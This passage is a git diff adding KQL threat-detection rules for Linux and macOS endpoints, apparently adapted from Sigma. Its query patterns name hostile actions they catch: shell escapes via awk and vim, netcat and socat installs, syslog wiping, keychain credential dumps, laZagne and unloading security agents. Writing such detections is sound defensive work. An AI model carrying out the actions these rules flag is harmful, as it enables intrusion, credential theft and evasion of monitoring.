+// MITRE Tactic: Reconnaissance
+// Tags: attack.reconnaissance, attack.t1593.003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " clone " and FolderPath endswith "/git") and (ProcessCommandLine contains "exploit" or ProcessCommandLine contains "Vulns" or ProcessCommandLine contains "vulnerability" or ProcessCommandLine contains "RCE" or ProcessCommandLine contains "RemoteCodeExecution" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "CVE-" or ProcessCommandLine contains "poc-" or ProcessCommandLine contains "ProofOfConcept" or ProcessCommandLine contains "proxyshell" or ProcessCommandLine contains "log4shell" or ProcessCommandLine contains "eternalblue" or ProcessCommandLine contains "eternal-blue" or ProcessCommandLine contains "MS17-")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/suspicious_invocation_of_shell_via_awk_linux.kql b/KQL/rules/linux/process_creation/suspicious_invocation_of_shell_via_awk_linux.kql
new file mode 100644
index 00000000..b531df6b
--- /dev/null
+++ b/KQL/rules/linux/process_creation/suspicious_invocation_of_shell_via_awk_linux.kql
@@ -0,0 +1,11 @@
+// Title: Suspicious Invocation of Shell via AWK - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-09-02
+// Level: high
+// Description: Detects the execution of "awk" or it's sibling commands, to invoke a shell using the system() function.
+// This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/dash" or ProcessCommandLine contains "/bin/fish" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/zsh") and (ProcessCommandLine contains "BEGIN {system" and (FolderPath endswith "/awk" or FolderPath endswith "/gawk" or FolderPath endswith "/mawk" or FolderPath endswith "/nawk"))
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/suspicious_invocation_of_shell_via_rsync.kql b/KQL/rules/linux/process_creation/suspicious_invocation_of_shell_via_rsync.kql
new file mode 100644
index 00000000..790c440a
--- /dev/null
+++ b/KQL/rules/linux/process_creation/suspicious_invocation_of_shell_via_rsync.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Invocation of Shell via Rsync
+// Author: Florian Roth
+// Date: 2025-01-18
+// Level: high
+// Description: Detects the execution of a shell as sub process of "rsync" without the expected command line flag "-e" being used, which could be an indication of exploitation as described in CVE-2024-12084. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.t1203
+
+DeviceProcessEvents
+| where ((FolderPath endswith "/ash" or FolderPath endswith "/bash" or FolderPath endswith "/csh" or FolderPath endswith "/dash" or FolderPath endswith "/ksh" or FolderPath endswith "/sh" or FolderPath endswith "/tcsh" or FolderPath endswith "/zsh") and (InitiatingProcessFolderPath endswith "/rsync" or InitiatingProcessFolderPath endswith "/rsyncd")) and (not(ProcessCommandLine contains " -e "))
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/suspicious_java_children_processes.kql b/KQL/rules/linux/process_creation/suspicious_java_children_processes.kql
new file mode 100644
index 00000000..9297fe2c
--- /dev/null
+++ b/KQL/rules/linux/process_creation/suspicious_java_children_processes.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Java Children Processes
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-03
+// Level: high
+// Description: Detects java process spawning suspicious children
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "bash" or ProcessCommandLine contains "dash" or ProcessCommandLine contains "ksh" or ProcessCommandLine contains "zsh" or ProcessCommandLine contains "csh" or ProcessCommandLine contains "fish" or ProcessCommandLine contains "curl" or ProcessCommandLine contains "wget" or ProcessCommandLine contains "python") and InitiatingProcessFolderPath endswith "/java"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/suspicious_nohup_execution.kql b/KQL/rules/linux/process_creation/suspicious_nohup_execution.kql
new file mode 100644
index 00000000..8d84b7b3
--- /dev/null
+++ b/KQL/rules/linux/process_creation/suspicious_nohup_execution.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Nohup Execution
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: high
+// Description: Detects execution of binaries located in potentially suspicious locations via "nohup"
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/tmp/" and FolderPath endswith "/nohup"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/suspicious_package_installed_linux.kql b/KQL/rules/linux/process_creation/suspicious_package_installed_linux.kql
new file mode 100644
index 00000000..48a6fa57
--- /dev/null
+++ b/KQL/rules/linux/process_creation/suspicious_package_installed_linux.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Package Installed - Linux
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-03
+// Level: medium
+// Description: Detects installation of suspicious packages using system installation utilities
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1553.004
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "install" and (FolderPath endswith "/apt" or FolderPath endswith "/apt-get")) or ((ProcessCommandLine contains "--install" or ProcessCommandLine contains "-i") and FolderPath endswith "/dpkg") or (ProcessCommandLine contains "-i" and FolderPath endswith "/rpm") or ((ProcessCommandLine contains "localinstall" or ProcessCommandLine contains "install") and FolderPath endswith "/yum")) and (ProcessCommandLine contains "nmap" or ProcessCommandLine contains " nc" or ProcessCommandLine contains "netcat" or ProcessCommandLine contains "wireshark" or ProcessCommandLine contains "tshark" or ProcessCommandLine contains "openconnect" or ProcessCommandLine contains "proxychains" or ProcessCommandLine contains "socat")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/syslog_clearing_or_removal_via_system_utilities.kql b/KQL/rules/linux/process_creation/syslog_clearing_or_removal_via_system_utilities.kql
new file mode 100644
index 00000000..b2e94c6a
--- /dev/null
+++ b/KQL/rules/linux/process_creation/syslog_clearing_or_removal_via_system_utilities.kql
@@ -0,0 +1,13 @@
+// Title: Syslog Clearing or Removal Via System Utilities
+// Author: Max Altgelt (Nextron Systems), Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
+// Date: 2021-10-15
+// Level: high
+// Description: Detects specific commands commonly used to remove or empty the syslog. Which is a technique often used by attacker as a method to hide their tracks
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.002
+// False Positives:
+//   - Log rotation.
+//   - Maintenance.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/var/log/syslog" and ((ProcessCommandLine contains "/dev/null" and FolderPath endswith "/cp") or ((ProcessCommandLine contains "-sf " or ProcessCommandLine contains "-sfn " or ProcessCommandLine contains "-sfT ") and (ProcessCommandLine contains "/dev/null " and ProcessCommandLine contains "/var/log/syslog") and FolderPath endswith "/ln") or FolderPath endswith "/mv" or ((ProcessCommandLine contains " -r " or ProcessCommandLine contains " -f " or ProcessCommandLine contains " -rf " or ProcessCommandLine contains "/var/log/syslog") and FolderPath endswith "/rm") or (ProcessCommandLine contains "-u " and FolderPath endswith "/shred") or ((ProcessCommandLine contains "-s " or ProcessCommandLine contains "-c " or ProcessCommandLine contains "--size") and (ProcessCommandLine contains "0 " and ProcessCommandLine contains "/var/log/syslog") and FolderPath endswith "/truncate") or FolderPath endswith "/unlink")) or ((ProcessCommandLine contains "journalctl --vacuum" or ProcessCommandLine contains "journalctl --rotate") or (ProcessCommandLine contains " > /var/log/syslog" or ProcessCommandLine contains " >/var/log/syslog" or ProcessCommandLine contains " >| /var/log/syslog" or ProcessCommandLine contains ": > /var/log/syslog" or ProcessCommandLine contains ":> /var/log/syslog" or ProcessCommandLine contains ":>/var/log/syslog" or ProcessCommandLine contains ">|/var/log/syslog"))
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/system_information_discovery.kql b/KQL/rules/linux/process_creation/system_information_discovery.kql
new file mode 100644
index 00000000..0ba5ef2c
--- /dev/null
+++ b/KQL/rules/linux/process_creation/system_information_discovery.kql
@@ -0,0 +1,12 @@
+// Title: System Information Discovery
+// Author: Ömer Günal, oscd.community
+// Date: 2020-10-08
+// Level: informational
+// Description: Detects system information discovery commands
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/uname" or FolderPath endswith "/hostname" or FolderPath endswith "/uptime" or FolderPath endswith "/lspci" or FolderPath endswith "/dmidecode" or FolderPath endswith "/lscpu" or FolderPath endswith "/lsmod"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/system_network_connections_discovery_linux.kql b/KQL/rules/linux/process_creation/system_network_connections_discovery_linux.kql
new file mode 100644
index 00000000..d96b0811
--- /dev/null
+++ b/KQL/rules/linux/process_creation/system_network_connections_discovery_linux.kql
@@ -0,0 +1,12 @@
+// Title: System Network Connections Discovery - Linux
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2020-10-19
+// Level: low
+// Description: Detects usage of system utilities to discover system network connections
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1049
+// False Positives:
+//   - Legitimate activities
+
+DeviceProcessEvents
+| where (FolderPath endswith "/who" or FolderPath endswith "/w" or FolderPath endswith "/last" or FolderPath endswith "/lsof" or FolderPath endswith "/netstat") and (not((FolderPath endswith "/who" and InitiatingProcessCommandLine contains "/usr/bin/landscape-sysinfo")))
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/system_network_discovery_linux.kql b/KQL/rules/linux/process_creation/system_network_discovery_linux.kql
new file mode 100644
index 00000000..1591d667
--- /dev/null
+++ b/KQL/rules/linux/process_creation/system_network_discovery_linux.kql
@@ -0,0 +1,12 @@
+// Title: System Network Discovery - Linux
+// Author: Ömer Günal and remotephone, oscd.community
+// Date: 2020-10-06
+// Level: informational
+// Description: Detects enumeration of local network configuration
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1016
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/etc/resolv.conf" or (FolderPath endswith "/firewall-cmd" or FolderPath endswith "/ufw" or FolderPath endswith "/iptables" or FolderPath endswith "/netstat" or FolderPath endswith "/ss" or FolderPath endswith "/ip" or FolderPath endswith "/ifconfig" or FolderPath endswith "/systemd-resolve" or FolderPath endswith "/route")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/touch_suspicious_service_file.kql b/KQL/rules/linux/process_creation/touch_suspicious_service_file.kql
new file mode 100644
index 00000000..3ae7800a
--- /dev/null
+++ b/KQL/rules/linux/process_creation/touch_suspicious_service_file.kql
@@ -0,0 +1,12 @@
+// Title: Touch Suspicious Service File
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-01-11
+// Level: medium
+// Description: Detects usage of the "touch" process in service file.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.006
+// False Positives:
+//   - Admin changing date of files.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -t " and ProcessCommandLine endswith ".service" and FolderPath endswith "/touch"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/triple_cross_ebpf_rootkit_execve_hijack.kql b/KQL/rules/linux/process_creation/triple_cross_ebpf_rootkit_execve_hijack.kql
new file mode 100644
index 00000000..a95a5a35
--- /dev/null
+++ b/KQL/rules/linux/process_creation/triple_cross_ebpf_rootkit_execve_hijack.kql
@@ -0,0 +1,12 @@
+// Title: Triple Cross eBPF Rootkit Execve Hijack
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-05
+// Level: high
+// Description: Detects execution of a the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "execve_hijack" and FolderPath endswith "/sudo"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/triple_cross_ebpf_rootkit_install_commands.kql b/KQL/rules/linux/process_creation/triple_cross_ebpf_rootkit_install_commands.kql
new file mode 100644
index 00000000..bc47c39c
--- /dev/null
+++ b/KQL/rules/linux/process_creation/triple_cross_ebpf_rootkit_install_commands.kql
@@ -0,0 +1,12 @@
+// Title: Triple Cross eBPF Rootkit Install Commands
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-05
+// Level: high
+// Description: Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1014
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " qdisc " or ProcessCommandLine contains " filter ") and (ProcessCommandLine contains " tc " and ProcessCommandLine contains " enp0s3 ") and FolderPath endswith "/sudo"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/ufw_force_stop_using_ufw_init.kql b/KQL/rules/linux/process_creation/ufw_force_stop_using_ufw_init.kql
new file mode 100644
index 00000000..53d35b3e
--- /dev/null
+++ b/KQL/rules/linux/process_creation/ufw_force_stop_using_ufw_init.kql
@@ -0,0 +1,12 @@
+// Title: Ufw Force Stop Using Ufw-Init
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-01-18
+// Level: medium
+// Description: Detects attempts to force stop the ufw using ufw-init
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.004
+// False Positives:
+//   - Network administrators
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-ufw-init" and ProcessCommandLine contains "force-stop") or (ProcessCommandLine contains "ufw" and ProcessCommandLine contains "disable")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/user_added_to_root_sudoers_group_using_usermod.kql b/KQL/rules/linux/process_creation/user_added_to_root_sudoers_group_using_usermod.kql
new file mode 100644
index 00000000..188348f0
--- /dev/null
+++ b/KQL/rules/linux/process_creation/user_added_to_root_sudoers_group_using_usermod.kql
@@ -0,0 +1,12 @@
+// Title: User Added To Root/Sudoers Group Using Usermod
+// Author: TuanLe (GTSC)
+// Date: 2022-12-21
+// Level: medium
+// Description: Detects usage of the "usermod" binary to add users add users to the root or suoders groups
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence
+// False Positives:
+//   - Legitimate administrator activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-aG root" or ProcessCommandLine contains "-aG sudoers") and FolderPath endswith "/usermod"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/user_has_been_deleted_via_userdel.kql b/KQL/rules/linux/process_creation/user_has_been_deleted_via_userdel.kql
new file mode 100644
index 00000000..cafb5b95
--- /dev/null
+++ b/KQL/rules/linux/process_creation/user_has_been_deleted_via_userdel.kql
@@ -0,0 +1,12 @@
+// Title: User Has Been Deleted Via Userdel
+// Author: Tuan Le (NCSGroup)
+// Date: 2022-12-26
+// Level: medium
+// Description: Detects execution of the "userdel" binary. Which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1531
+// False Positives:
+//   - Legitimate administrator activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/userdel"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/vim_gtfobin_abuse_linux.kql b/KQL/rules/linux/process_creation/vim_gtfobin_abuse_linux.kql
new file mode 100644
index 00000000..62f7be84
--- /dev/null
+++ b/KQL/rules/linux/process_creation/vim_gtfobin_abuse_linux.kql
@@ -0,0 +1,11 @@
+// Title: Vim GTFOBin Abuse - Linux
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-28
+// Level: high
+// Description: Detects the use of "vim" and it's siblings commands to execute a shell or proxy commands.
+// Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ":!/" or ProcessCommandLine contains ":lua " or ProcessCommandLine contains ":py " or ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/dash" or ProcessCommandLine contains "/bin/fish" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/zsh") and ((ProcessCommandLine contains " --cmd" or ProcessCommandLine contains " -c ") and (FolderPath endswith "/rvim" or FolderPath endswith "/vim" or FolderPath endswith "/vimdiff"))
\ No newline at end of file
diff --git a/KQL/rules/macos/file_event/macos_emond_launch_daemon.kql b/KQL/rules/macos/file_event/macos_emond_launch_daemon.kql
new file mode 100644
index 00000000..7d4cf49c
--- /dev/null
+++ b/KQL/rules/macos/file_event/macos_emond_launch_daemon.kql
@@ -0,0 +1,12 @@
+// Title: MacOS Emond Launch Daemon
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-23
+// Level: medium
+// Description: Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.014
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceFileEvents
+| where (FolderPath contains "/etc/emond.d/rules/" and FolderPath endswith ".plist") or FolderPath contains "/private/var/db/emondClients/"
\ No newline at end of file
diff --git a/KQL/rules/macos/file_event/startup_item_file_created_macos.kql b/KQL/rules/macos/file_event/startup_item_file_created_macos.kql
new file mode 100644
index 00000000..3b979933
--- /dev/null
+++ b/KQL/rules/macos/file_event/startup_item_file_created_macos.kql
@@ -0,0 +1,14 @@
+// Title: Startup Item File Created - MacOS
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-14
+// Level: low
+// Description: Detects the creation of a startup item plist file, that automatically get executed at boot initialization to establish persistence.
+// Adversaries may use startup items automatically executed at boot initialization to establish persistence.
+// Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1037.005
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceFileEvents
+| where FolderPath endswith ".plist" and (FolderPath startswith "/Library/StartupItems/" or FolderPath startswith "/System/Library/StartupItems")
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/binary_padding_macos.kql b/KQL/rules/macos/process_creation/binary_padding_macos.kql
new file mode 100644
index 00000000..1bc6cb68
--- /dev/null
+++ b/KQL/rules/macos/process_creation/binary_padding_macos.kql
@@ -0,0 +1,12 @@
+// Title: Binary Padding - MacOS
+// Author: Igor Fits, Mikhail Larin, oscd.community
+// Date: 2020-10-19
+// Level: high
+// Description: Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027.001
+// False Positives:
+//   - Legitimate script work
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "if=/dev/zero" or ProcessCommandLine contains "if=/dev/random" or ProcessCommandLine contains "if=/dev/urandom") and FolderPath endswith "/dd") or (ProcessCommandLine contains "-s +" and FolderPath endswith "/truncate")
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/clipboard_data_collection_via_osascript.kql b/KQL/rules/macos/process_creation/clipboard_data_collection_via_osascript.kql
new file mode 100644
index 00000000..d8070d43
--- /dev/null
+++ b/KQL/rules/macos/process_creation/clipboard_data_collection_via_osascript.kql
@@ -0,0 +1,12 @@
+// Title: Clipboard Data Collection Via OSAScript
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-01-31
+// Level: high
+// Description: Detects possible collection of data from the clipboard via execution of the osascript binary
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.execution, attack.t1115, attack.t1059.002
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "osascript" and ProcessCommandLine contains " -e " and ProcessCommandLine contains "clipboard"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/creation_of_a_local_user_account.kql b/KQL/rules/macos/process_creation/creation_of_a_local_user_account.kql
new file mode 100644
index 00000000..27c7fb62
--- /dev/null
+++ b/KQL/rules/macos/process_creation/creation_of_a_local_user_account.kql
@@ -0,0 +1,12 @@
+// Title: Creation Of A Local User Account
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-06
+// Level: low
+// Description: Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.
+// MITRE Tactic: Persistence
+// Tags: attack.t1136.001, attack.persistence
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "create" and FolderPath endswith "/dscl") or (ProcessCommandLine contains "addUser" and FolderPath endswith "/sysadminctl")
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/credentials_from_password_stores_keychain.kql b/KQL/rules/macos/process_creation/credentials_from_password_stores_keychain.kql
new file mode 100644
index 00000000..cb3815a2
--- /dev/null
+++ b/KQL/rules/macos/process_creation/credentials_from_password_stores_keychain.kql
@@ -0,0 +1,12 @@
+// Title: Credentials from Password Stores - Keychain
+// Author: Tim Ismilyaev, oscd.community, Florian Roth (Nextron Systems)
+// Date: 2020-10-19
+// Level: medium
+// Description: Detects passwords dumps from Keychain
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555.001
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "find-certificate" or ProcessCommandLine contains " export ") and FolderPath =~ "/usr/bin/security") or (ProcessCommandLine contains " dump-keychain " or ProcessCommandLine contains " login-keychain ")
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/credentials_in_files.kql b/KQL/rules/macos/process_creation/credentials_in_files.kql
new file mode 100644
index 00000000..35401654
--- /dev/null
+++ b/KQL/rules/macos/process_creation/credentials_in_files.kql
@@ -0,0 +1,10 @@
+// Title: Credentials In Files
+// Author: Igor Fits, Mikhail Larin, oscd.community
+// Date: 2020-10-19
+// Level: high
+// Description: Detecting attempts to extract passwords with grep and laZagne
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "password" and FolderPath endswith "/grep") or ProcessCommandLine contains "laZagne"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/decode_base64_encoded_text_macos.kql b/KQL/rules/macos/process_creation/decode_base64_encoded_text_macos.kql
new file mode 100644
index 00000000..3de0b28d
--- /dev/null
+++ b/KQL/rules/macos/process_creation/decode_base64_encoded_text_macos.kql
@@ -0,0 +1,12 @@
+// Title: Decode Base64 Encoded Text -MacOs
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2020-10-19
+// Level: low
+// Description: Detects usage of base64 utility to decode arbitrary base64-encoded text
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027
+// False Positives:
+//   - Legitimate activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-d" and FolderPath =~ "/usr/bin/base64"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/disable_security_tools.kql b/KQL/rules/macos/process_creation/disable_security_tools.kql
new file mode 100644
index 00000000..8fed30a3
--- /dev/null
+++ b/KQL/rules/macos/process_creation/disable_security_tools.kql
@@ -0,0 +1,12 @@
+// Title: Disable Security Tools
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2020-10-19
+// Level: medium
+// Description: Detects disabling security tools
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Legitimate activities
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "unload" and FolderPath =~ "/bin/launchctl") and (ProcessCommandLine contains "com.objective-see.lulu.plist" or ProcessCommandLine contains "com.objective-see.blockblock.plist" or ProcessCommandLine contains "com.google.santad.plist" or ProcessCommandLine contains "com.carbonblack.defense.daemon.plist" or ProcessCommandLine contains "com.carbonblack.daemon.plist" or ProcessCommandLine contains "at.obdev.littlesnitchd.plist" or ProcessCommandLine contains "com.tenablesecurity.nessusagent.plist" or ProcessCommandLine contains "com.opendns.osx.RoamingClientConfigUpdater.plist" or ProcessCommandLine contains "com.crowdstrike.falcond.plist" or ProcessCommandLine contains "com.crowdstrike.userdaemon.plist" or ProcessCommandLine contains "osquery" or ProcessCommandLine contains "filebeat" or ProcessCommandLine contains "auditbeat" or ProcessCommandLine contains "packetbeat" or ProcessCommandLine contains "td-agent")) or (ProcessCommandLine contains "disable" and FolderPath =~ "/usr/sbin/spctl")
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/disk_image_creation_via_hdiutil_macos.kql b/KQL/rules/macos/process_creation/disk_image_creation_via_hdiutil_macos.kql
new file mode 100644
index 00000000..acad549f
--- /dev/null
+++ b/KQL/rules/macos/process_creation/disk_image_creation_via_hdiutil_macos.kql
@@ -0,0 +1,12 @@
+// Title: Disk Image Creation Via Hdiutil - MacOS
+// Author: Omar Khaled (@beacon_exe)
+// Date: 2024-08-10
+// Level: medium
+// Description: Detects the execution of the hdiutil utility in order to create a disk image.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration
+// False Positives:
+//   - Legitimate usage of hdiutil by administrators and users.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "create" and FolderPath endswith "/hdiutil"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/disk_image_mounting_via_hdiutil_macos.kql b/KQL/rules/macos/process_creation/disk_image_mounting_via_hdiutil_macos.kql
new file mode 100644
index 00000000..1632ad0c
--- /dev/null
+++ b/KQL/rules/macos/process_creation/disk_image_mounting_via_hdiutil_macos.kql
@@ -0,0 +1,12 @@
+// Title: Disk Image Mounting Via Hdiutil - MacOS
+// Author: Omar Khaled (@beacon_exe)
+// Date: 2024-08-10
+// Level: medium
+// Description: Detects the execution of the hdiutil utility in order to mount disk images.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.collection, attack.t1566.001, attack.t1560.001
+// False Positives:
+//   - Legitimate usage of hdiutil by administrators and users.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "attach " or ProcessCommandLine contains "mount ") and FolderPath endswith "/hdiutil"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/file_and_directory_discovery_macos.kql b/KQL/rules/macos/process_creation/file_and_directory_discovery_macos.kql
new file mode 100644
index 00000000..05454ab1
--- /dev/null
+++ b/KQL/rules/macos/process_creation/file_and_directory_discovery_macos.kql
@@ -0,0 +1,12 @@
+// Title: File and Directory Discovery - MacOS
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2020-10-19
+// Level: informational
+// Description: Detects usage of system utilities to discover files and directories
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+// False Positives:
+//   - Legitimate activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine matches regex "(.){200,}" and FolderPath =~ "/usr/bin/file") or FolderPath =~ "/usr/bin/find" or FolderPath =~ "/usr/bin/mdfind" or (ProcessCommandLine contains "-R" and FolderPath =~ "/bin/ls") or FolderPath =~ "/tree"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/file_download_via_nscurl_macos.kql b/KQL/rules/macos/process_creation/file_download_via_nscurl_macos.kql
new file mode 100644
index 00000000..18b4e268
--- /dev/null
+++ b/KQL/rules/macos/process_creation/file_download_via_nscurl_macos.kql
@@ -0,0 +1,12 @@
+// Title: File Download Via Nscurl - MacOS
+// Author: Daniel Cortez
+// Date: 2024-06-04
+// Level: medium
+// Description: Detects the execution of the nscurl utility in order to download files.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.command-and-control, attack.t1105
+// False Positives:
+//   - Legitimate usage of nscurl by administrators and users.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "--download " or ProcessCommandLine contains "--download-directory " or ProcessCommandLine contains "--output " or ProcessCommandLine contains "-dir " or ProcessCommandLine contains "-dl " or ProcessCommandLine contains "-ld" or ProcessCommandLine contains "-o ") and FolderPath endswith "/nscurl"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/file_time_attribute_change.kql b/KQL/rules/macos/process_creation/file_time_attribute_change.kql
new file mode 100644
index 00000000..e51178de
--- /dev/null
+++ b/KQL/rules/macos/process_creation/file_time_attribute_change.kql
@@ -0,0 +1,10 @@
+// Title: File Time Attribute Change
+// Author: Igor Fits, Mikhail Larin, oscd.community
+// Date: 2020-10-19
+// Level: medium
+// Description: Detect file time attribute change to hide new or changes to existing files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.006
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-t" or ProcessCommandLine contains "-acmr" or ProcessCommandLine contains "-d" or ProcessCommandLine contains "-r") and FolderPath endswith "/touch"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/gatekeeper_bypass_via_xattr.kql b/KQL/rules/macos/process_creation/gatekeeper_bypass_via_xattr.kql
new file mode 100644
index 00000000..a5ade537
--- /dev/null
+++ b/KQL/rules/macos/process_creation/gatekeeper_bypass_via_xattr.kql
@@ -0,0 +1,12 @@
+// Title: Gatekeeper Bypass via Xattr
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2020-10-19
